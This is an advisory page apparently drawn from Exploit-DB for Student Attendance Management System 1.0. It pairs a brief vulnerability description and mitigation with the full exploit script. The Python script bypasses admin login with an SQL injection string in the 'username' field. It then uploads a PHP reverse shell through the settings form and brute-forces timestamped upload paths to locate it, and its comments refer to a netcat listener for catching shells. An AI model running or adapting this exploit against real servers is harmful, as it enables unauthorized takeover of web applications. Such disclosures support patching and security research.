Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution

vendor:

Student Attendance Management System

by:

mosaaed

9.8

CVSS

HIGH

SQL Injection / Remote Code Execution

CWE

Product Name: Student Attendance Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:student_attendance_management_system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Parrot 5.5.17 + Apache 2.4.46

2020

Student Attendance Management System 1.0 – ‘username’ SQL Injection / Remote Code Execution

An attacker can exploit a SQL injection vulnerability in the Student Attendance Management System 1.0 application to execute arbitrary code on the server. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' parameter of the 'ajax.php' script. An attacker can send a specially crafted request containing malicious SQL statements to the vulnerable script, which will be executed in the context of the application. This can be exploited to manipulate SQL queries to disclose sensitive information from the database, modify data, or execute arbitrary code on the server.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46

# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz



#!/usr/bin/python3

import requests
import time

def sqli_admin():
        s = requests.Session()
        data = {"username":"admin'or'1'=1#","password":"mosaaed"}
        adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
        s.post(adminlogin,data=data)
        return s

def trigger_rce(session):
        starttime = int(time.time())
        multipart_form_data = {
        "name": ("cyberscurity"),
        "email": ("test@test.com"),
        "contact" : ("+11111111111"),
        "about" : ("attack"),
        "img" : ("shell.php", open("shell.php", "rb"))
        }
        session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data)
        get_shell(starttime-100,starttime+100,session)


def get_shell(start,end,session):
        for i in range(start,end):
                 session.get("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
                 response = requests.get ("http://localhost/sta/assets/uploads/"+ str(i) +"_shell.php")
                 if response.status_code == 200:
                            print("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
                        

def main():
        session = sqli_admin()
        trigger_rce(session)

if __name__ == '__main__':
        main()